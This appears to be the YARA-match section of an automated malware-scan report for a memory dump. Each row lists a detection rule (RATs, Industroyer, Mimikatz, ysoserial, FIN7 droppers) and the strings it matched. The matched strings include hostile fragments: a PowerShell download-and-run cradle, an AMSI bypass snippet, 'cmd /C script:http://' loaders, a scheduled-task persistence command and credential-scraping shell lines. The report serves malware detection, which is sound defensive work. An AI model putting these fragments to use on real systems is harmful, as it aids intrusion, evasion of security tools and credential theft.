- 0x19b49:$s3: 20D5CCEE9C91A1E61F72F46FA117B93FB006DB51
- 0x19b76:$s4: 9EBF75119B8FC7733F77B06378F9E735D34664F6
|
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp | BeyondExec_RemoteAccess_Tool | Detects BeyondExec Remote Access Tool - file rexesvr.exe | Florian Roth | - 0x38f6a:$x1: \BeyondExecV2\Server\Release\Pipes.pdb
- 0x38f95:$x2: \\.\pipe\beyondexec%d-stdin
- 0x38fb5:$x3: Failed to create dispatch pipe. Do you have another instance running?
- 0x39000:$op1: 83 E9 04 72 0C 83 E0 03 03 C8 FF 24 85 80 6F 40
- 0x39016:$op2: 6A 40 33 C0 59 BF E0 D8 40 00 F3 AB 8D 0C 52 C1
|
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp | Disclosed_0day_POCs_injector | Detects POC code from disclosed 0day hacktool set | Florian Roth | - 0x12926:$x1: \Release\injector.pdb
- 0x12940:$x2: Cannot write the shellcode in the process memory, error:
- 0x1297e:$x3: /s shellcode_file PID: shellcode injection.
- 0x129ae:$x4: /d dll_file PID: dll injection via LoadLibrary().
- 0x1297e:$x5: /s shellcode_file PID
- 0x129e4:$x5: /s shellcode_file PID
- 0x129fe:$x6: Shellcode copied in memory: OK
- 0x12a21:$x7: Usage of the injector.
- 0x12a3d:$x8: KO: cannot obtain the SeDebug privilege.
|
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp | APT_PupyRAT_PY | Detects Pupy RAT | Florian Roth | - 0xa146:$x1: reflective_inject_dll
- 0xa1c7:$x1: reflective_inject_dll
- 0xa1e1:$x1: reflective_inject_dll
- 0x3b960:$x1: reflective_inject_dll
- 0x3b97a:$x2: ImportError: pupy builtin module not found !
- 0x3b9ab:$x3: please start pupy from either it's exe stub or it's reflective DLLR;
- 0xa19a:$x4: [INJECT] inject_dll.
- 0x3b9f4:$x4: [INJECT] inject_dll.
- 0x3ba0d:$x5: import base64,zlib;exec zlib.decompress(base64.b64decode('eJzzcQz1c/ZwDbJVT87Py0tNLlHnAgA56wXS'))
- 0x3ba74:$op1: 8B 42 0C 8B 78 14 89 5C 24 18 89 7C 24 14 3B FD
|
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp | OilRig_Strings_Oct17 | Detects strings from OilRig malware and malicious scripts | Florian Roth | - 0x6b9:$x1: %localappdata%\srvHealth.exe
- 0x6da:$x2: %localappdata%\srvBS.txt
- 0x6f7:$x3: Agent Injector\PolicyConverter\Inner\obj\Release\Inner.pdb
- 0x736:$x4: Agent Injector\PolicyConverter\Joiner\obj\Release\Joiner.pdb
- 0x777:$s3: .LoadDll("Run", arg, "C:\\Windows\\
|
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp | Suspicious_Script_Running_from_HTTP | Detects a suspicious | Florian Roth | - 0x9211:$s1: cmd /C script:http://
- 0x922b:$s2: cmd /C script:https://
- 0x9246:$s3: cmd.exe /C script:http://
- 0x9264:$s4: cmd.exe /C script:https://
|
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp | VBS_dropper_script_Dec17_1 | Detects a supicious VBS script that drops an executable | Florian Roth | - 0x906:$s5: TVqQAAMAAAAEAA
- 0xf74b:$s5: TVqQAAMAAAAEAA
- 0x3fd7:$a1: = CreateObject("Wscript.Shell")
- 0x3d725:$a1: = CreateObject("Wscript.Shell")
- 0x3df7d:$a1: = CreateObject("Wscript.Shell")
|
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp | Industroyer_Malware_1 | Detects Industroyer related malware | Florian Roth | - 0x170d5:$s1: haslo.exe
- 0x17136:$x1: 00 53 00 65 00 72 00 76 00 69 00 63 00 65 00 73 00 5C 00 25 00 6C 00 73 00 00 00 49 00 6D 00 61 ...
- 0x17182:$x2: haslo.datCrash
|
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp | Industroyer_Portscan_3_Output | Detects Industroyer related custom port scaner output file | Florian Roth | - 0x16f5b:$s1: WSA library load complite.
- 0x16f7a:$s2: Connection refused
|
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp | Industroyer_Malware_4 | Detects Industroyer related malware | Florian Roth | - 0x17812:$s2: defragsvc
- 0x17820:$a1: 00 2E 00 64 00 61 00 74 00 00 00 43 72 61 73 68 00 00 00
|
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp | Industroyer_Malware_5 | Detects Industroyer related malware | Florian Roth | - 0x1796f:$x1: D2MultiCommService.exe
- 0x1798a:$x2: Crash104.dll
- 0x1799b:$x3: iec104.log
- 0x179aa:$x4: IEC-104 client: ip=%s; port=%s; ASDU=%u
- 0x179d7:$s1: Error while getaddrinfo executing: %d
- 0x17a01:$s2: return info-Remote command
- 0x17a20:$s3: Error killing process ...
- 0x17a3e:$s4: stop_comm_service_name
- 0x17a59:$s5: *1* Data exchange: Send: %d (%s)
|
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp | redSails_PY | Detects Red Sails Hacktool - Python | Florian Roth | - 0x3b6d:$x1: Gained command shell on host
- 0x3b8e:$x2: [!] Received an ERROR in shell()
- 0x3bb3:$x3: Target IP address with backdoor installed
- 0x3be1:$x4: Open backdoor port on target machine
- 0x3c0a:$x5: Backdoor port to open on victim machine
|
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp | Rehashed_RAT_2 | Detects malware from Rehashed RAT incident | Florian Roth | - 0x747f:$x1: dalat.dulichovietnam.net
- 0x749c:$x2: web.Thoitietvietnam.org
- 0x74b8:$a1: User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64)
- 0x7502:$a2: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3
- 0x7587:$s1: GET /%s%s%s%s HTTP/1.1
- 0x75a2:$s2: http://%s:%d/%s%s%s%s
- 0x75bc:$s3: {521338B8-3378-58F7-AFB9-E7D35E683BF8}
|
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp | Malware_QA_vqgk | VT Research QA uploaded malware - file vqgk.dll | Florian Roth | - 0xea16:$x3: %d is an x86 process (can't inject x64 content)
- 0x17f91:$x3: %d is an x86 process (can't inject x64 content)
- 0xe9e0:$s1: powershell -nop -exec bypass -EncodedCommand "%s"
- 0x17f5b:$s1: powershell -nop -exec bypass -EncodedCommand "%s"
- 0x17fc5:$s2: Could not open process token: %d (%u)
- 0xeac5:$s5: Failed to impersonate logged on user %d (%u)
- 0xea4a:$s6: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s
- 0x17f0d:$s6: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s
- 0x36:$s7: could not write to process memory: %d
- 0xea98:$s9: Failed to impersonate token from %d (%u)
|
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp | Pupy_Backdoor | Detects Pupy backdoor | Florian Roth | - 0xa08d:$x1: reflectively inject a dll into a process.
- 0xa0bb:$x2: ld_preload_inject_dll(cmdline, dll_buffer, hook_exit) -> pid
- 0xa0fc:$x3: LD_PRELOAD=%s HOOK_EXIT=%d CLEANUP=%d exec %s 1>/dev/null 2>/dev/null
- 0xa146:$x4: reflective_inject_dll
- 0xa1c7:$x4: reflective_inject_dll
- 0xa1e1:$x4: reflective_inject_dll
- 0x3b960:$x4: reflective_inject_dll
- 0xa0bb:$x5: ld_preload_inject_dll
- 0xa160:$x5: ld_preload_inject_dll
- 0xa17a:$x6: get_pupy_config() -> string
- 0xa19a:$x7: [INJECT] inject_dll. OpenProcess failed.
- 0xa146:$x8: reflective_inject_dll
- 0xa1c7:$x8: reflective_inject_dll
- 0xa1e1:$x8: reflective_inject_dll
- 0x3b960:$x8: reflective_inject_dll
- 0xa1e1:$x9: reflective_inject_dll(pid, dll_buffer, isRemoteProcess64bits)
- 0xa224:$x10: linux_inject_main
|
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp | Microcin_Sample_5 | Malware sample mentioned in Microcin technical report by Kaspersky | Florian Roth | - 0x502e:$x1: Sorry, you are not fortuante ^_^, Please try other password dictionary
- 0x507a:$x2: DomCrack <IP> <UserName> <Password_Dic file path> <option>
- 0x50b9:$x3: The password is "%s" Time: %d(s)
- 0x50e6:$x4: The password is " %s " Time: %d(s)
- 0x5115:$x5: No password found!
- 0x512c:$x7: Can not found the Password Dictoonary file!
|
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp | clearlog | Detects Fireball malware - file clearlog.dll | Florian Roth | - 0x1942d:$x1: \ClearLog\Release\logC.pdb
- 0x19472:$s2: logC.dll
- 0x1949b:$s5: Logger Name:
|
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp | PS_AMSI_Bypass | Detects PowerShell AMSI Bypass | Florian Roth | - 0xf21c:$s1: .GetField('amsiContext',[Reflection.BindingFlags]'NonPublic,Static').
|
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp | JS_Suspicious_Obfuscation_Dropbox | Detects PowerShell AMSI Bypass | Florian Roth | - 0xf3e7:$x1: j"+"a"+"v"+"a"+"s"+"c"+"r"+"i"+"p"+"t"
- 0xf412:$x2: script:https://www.dropbox.com
|
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp | JS_Suspicious_MSHTA_Bypass | Detects MSHTA Bypass | Florian Roth | - 0x7e06:$s1: mshtml,RunHTMLApplication
- 0xf58b:$s1: mshtml,RunHTMLApplication
- 0xf5a9:$s2: new ActiveXObject("WScript.Shell").Run(
- 0xf5d5:$s3: /c start mshta j
|
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp | JavaScript_Run_Suspicious | Detects a suspicious Javascript Run command | Florian Roth | - 0x8e2e:$s1: w = new ActiveXObject(
- 0x8e49:$s2: w.Run(r);
|
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp | FVEY_ShadowBroker_Auct_Dez16_Strings | String from the ShodowBroker Files Screenshots - Dec 2016 | Florian Roth | - 0x2cf62:$s2: Auditcleaner
- 0x2cfc9:$s2: Auditcleaner
- 0x3276e:$s11: elatedmonkey
- 0x327e2:$s11: elatedmonkey
- 0x2d578:$s17: ys.ratload.sh
- 0x2bccd:$elf4: charm_saver
- 0x2f51d:$elf8: ebbshave
- 0x2f585:$elf8: ebbshave
- 0x2f7bb:$elf9: eggbasket
- 0x2f824:$elf9: eggbasket
- 0x31a3c:$elf12: envoytomato
- 0x31aa2:$elf12: envoytomato
- 0x31827:$elf14: estopmoonlit
- 0x3188e:$elf14: estopmoonlit
- 0x33089:$elf17: ghost_sparc
- 0x33106:$elf17: ghost_sparc
- 0x30e1e:$elf18: jackpop
- 0x30e85:$elf18: jackpop
- 0x2a8c4:$elf19: orleans_stride
- 0x2ae50:$elf21: seconddate
- 0x2bccd:$pe2: charm_saver
|
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp | Ysoserial_Payload_Spring1 | Ysoserial Payloads - file Spring1.bin | Florian Roth | - 0x3ea43:$x1: ysoserial/Pwner
|
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp | Ysoserial_Payload | Ysoserial Payloads | Florian Roth | - 0x3eb98:$x1: ysoserial/payloads/
- 0x3ebb0:$s1: StubTransletPayload
- 0x3ebc8:$s2: Pwnrpw
|
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp | Ysoserial_Payload_3 | Ysoserial Payloads - from files JavassistWeld1.bin, JBossInterceptors.bin | Florian Roth | - 0x3ed4d:$x1: ysoserialq
- 0x3ed5c:$s1: targetClassInterceptorMetadatat
- 0x3ed80:$s2: targetInstancet
- 0x3ed94:$s3: targetClassL
- 0x3eda5:$s4: POST_ACTIVATEsr
- 0x3edb9:$s5: PRE_DESTROYsq
|
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp | CACTUSTORCH | Detects CactusTorch Hacktool | Florian Roth | - 0xc84c:$x1: $payload = shellcode(%options["listener"], "true", "x86");
- 0xc88b:$x2: Copy the base64 encoded payload into the code variable below.
- 0xc8ee:$x4: ms.Write transform.TransformFinalBlock(enc.GetBytes_4(b), 0, length), 0, ((length / 4) * 3)
- 0xc94e:$x5: ' Author: Vincent Yiu (@vysecurity)
- 0xc976:$x6: Dim binary : binary = "rundll32.exe"
- 0xc99f:$a1: code = code & "
- 0xc9b3:$a2: serialized_obj = serialized_obj & "
- 0xc983:$s1: binary = "rundll32.exe"
- 0xc9db:$s1: binary = "rundll32.exe"
- 0xca4c:$s1: binary = "rundll32.exe"
- 0xc9f7:$s2: EL.DataType = "bin.hex"
- 0xca13:$s3: Set stm = CreateObject("System.IO.MemoryStream")
- 0xca48:$s4: var binary = "rundll32.exe";
- 0xca69:$s5: var serialized_obj = "
|
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp | Quasar_RAT_1 | Detects Quasar RAT | Florian Roth | - 0x340c6:$s1: DoUploadAndExecute
- 0x340dd:$s2: DoDownloadAndExecute
- 0x340f6:$s3: DoShellExecute
- 0x34109:$s4: set_Processname
- 0x3411e:$op1: 04 1E FE 02 04 16 FE 01 60
- 0x3412d:$op2: 00 17 03 1F 20 17 19 15 28
- 0x3413c:$op3: 00 04 03 69 91 1B 40
|
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp | Quasar_RAT_2 | Detects Quasar RAT | Florian Roth | - 0x3428e:$x1: GetKeyloggerLogsResponse
- 0x342ab:$x2: get_Keylogger
- 0x342bd:$x3: HandleGetKeyloggerLogsResponse
- 0x342e0:$s1: DoShellExecuteResponse
- 0x342fb:$s2: GetPasswordsResponse
- 0x34314:$s3: GetStartupItemsResponse
- 0x34330:$s4: <GetGenReader>b__7
- 0x34347:$s5: RunHidden
|
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp | OpCloudHopper_Malware_2 | Detects malware from Operation Cloud Hopper | Florian Roth | - 0x3713a:$x1: sERvEr.Dll
- 0x3715a:$x3: .?AVCKeyLoggerManager@@
- 0x37176:$x4: GH0STCZH
- 0x371df:$s3: \Release\Loader.pdb
- 0x37266:$op1: 8D 34 17 8D 49 00 8A 14 0E 3A 14 29 75 05 41 3B
- 0x3727c:$op2: 83 E8 14 78 CF C1 E0 06 8B F8 8B C3 8A 08 84 C9
- 0x37292:$op3: 3B FB 7D 3F 8A 4D 14 8D 45 14 84 C9 74 1B 8A 14
|
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp | OpCloudHopper_Malware_3 | Detects malware from Operation Cloud Hopper | Florian Roth | - 0x37429:$s6: operator ""
- 0x37830:$s6: operator ""
- 0x38000:$s6: operator ""
- 0x36f5c:$s7: zok]\\\ZZYYY666564444
- 0x3743a:$s7: zok]\\\ZZYYY666564444
- 0x38033:$s7: zok]\\\ZZYYY666564444
- 0x3b347:$s7: zok]\\\ZZYYY666564444
- 0x37455:$s11: InvokeMainViaCRT
- 0x37841:$s11: InvokeMainViaCRT
- 0x3746b:$s12: .?AVAES@@
- 0x37857:$s12: .?AVAES@@
- 0x3747a:$op1: B6 4C 06 F5 32 CF 88 4C 06 05 0F B6 4C 06 F9 32
- 0x37490:$op2: 06 FC EB 03 8A 5E F0 85 C0 74 05 8A 0C 06 EB 03
- 0x374a6:$op3: 7E F8 85 C0 74 06 8A 74 06 08 EB 03 8A 76 FC 85
|
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp | OpCloudHopper_Malware_5 | Detects malware from Operation Cloud Hopper | Florian Roth | - 0x379e7:$x1: CWINDOWSSYSTEMROOT
- 0x379fe:$x2: YJ_D_KROPOX_M_NUJI_OLY_S_JU_MOOK
- 0x37a23:$x3: NJK_JK_SED_PNJHGFUUGIOO_PIY
- 0x37a43:$x4: c_VDGQBUl}YSB_C_VDlqSDYFU
- 0x37a61:$s7: FALLINLOVE
- 0x37a71:$op1: 83 EC 60 8D 4C 24 00 E8 6F FF FF FF 8D 4C 24 00
|
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp | OpCloudHopper_WmiDLL_inMemory | Malware related to Operation Cloud Hopper - Page 25 | Florian Roth | - 0x35b31:$s1: wmi.dll 2>&1
|
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp | VBS_WMIExec_Tool_Apr17_1 | Tools related to Operation Cloud Hopper | Florian Roth | - 0x36c21:$x1: strNetUse = "cmd.exe /c net use \\" & host
- 0x36c50:$x2: localcmd = "cmd.exe /c " & command
- 0x36c78:$x3: & " > " & TempFile & " 2>&1" '2>&1 err
- 0x36ca4:$x4: strExec = "cmd.exe /c " & cmd & " >> " & resultfile & " 2>&1" '2>&1 err
- 0x36cf1:$x5: TempFile = objShell.ExpandEnvironmentStrings("%TEMP%") & "\wmi.dll"
- 0x36d39:$a1: WMIEXEC ERROR: Command ->
- 0x36d58:$a2: WMIEXEC : Command result will output to
- 0x36d84:$a3: WMIEXEC : Target ->
- 0x36d9c:$a4: WMIEXEC : Login -> OK
- 0x36db6:$a5: WMIEXEC : Process created. PID:
|
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp | RevengeRAT_Sep17 | Detects RevengeRAT malware | Florian Roth | - 0x790c:$x1: Nuclear Explosion.g.resources
- 0x795b:$x4: 5B1EE7CAD3DFF220A95D1D6B91435D9E1520AC41
- 0x7988:$x5: \RevengeRAT\
- 0x7999:$x6: Revenge-RAT client has been successfully installed.
- 0x79d1:$x7: Nuclear Explosion.exe
|
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp | Mimipenguin_SH | Detects Mimipenguin Password Extractor - Linux | Florian Roth | - 0x386de:$s1: $(echo $thishash | cut -d'$' -f 3)
- 0x38705:$s2: ps -eo pid,command | sed -rn '/gnome\-keyring\-daemon/p' | awk
- 0x38748:$s3: MimiPenguin Results:
|
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp | POSHSPY_Malware | Detects | Florian Roth | - 0xfbd6:$x1: function sWP($cN, $pN, $aK, $aI)
- 0xfbfb:$x2: $aeK = [byte[]] (0x69, 0x87, 0x0b, 0xf2
- 0xfc27:$x3: (('variant', 'excretions', 'accumulators', 'winslow', 'whistleable', 'len',
- 0xfc77:$x4: $cPairKey = "BwIAAACkAABSU0EyAAQAAAEAA
- 0xfca2:$x5: $exeRes = exePldRoutine
- 0xfcbe:$x6: ZgB1AG4AYwB0AGkAbwBuACAAcAB1AHIAZgBDAHIA
|
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp | Invoke_Mimikatz | Detects Invoke-Mimikatz String | Florian Roth | - 0xf74b:$x2: TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAEAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm
- 0xf7c2:$x3: Write-BytesToMemory -Bytes $Shellcode1 -MemoryAddress $GetCommandLineWAddrTemp
|
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp | FIN7_Backdoor_Aug17 | Detects Word Dropper from Proofpoint FIN7 Report | Florian Roth | - 0xb761:$x1: wscript.exe //b /e:jscript C:\Users\
- 0xb78a:$x2: wscript.exe /b /e:jscript C:\Users\
- 0xb7b2:$x3: schtasks /Create /f /tn "GoogleUpdateTaskMachineSystem" /tr "wscript.exe
- 0xb7ff:$x4: schtasks /Delete /F /TN ""GoogleUpdateTaskMachineCore
- 0xb839:$x5: schtasks /Delete /F /TN "GoogleUpdateTaskMachineCore
- 0xb872:$x6: wscript.exe //b /e:jscript %TMP%\debug.txt
- 0xb8a1:$s1: /?page=wait
- 0xb8b1:$a1: autoit3.exe
- 0xb8c1:$a2: dumpcap.exe
- 0xb8d1:$a3: tshark.exe
- 0xb8e0:$a4: prl_cc.exe
- 0xb8ef:$v1: vmware
- 0xb8fa:$v2: PCI\\VEN_80EE&DEV_CAFE
- 0xb915:$v3: VMWVMCIHOSTDEV
- 0xb928:$c1: apowershell
|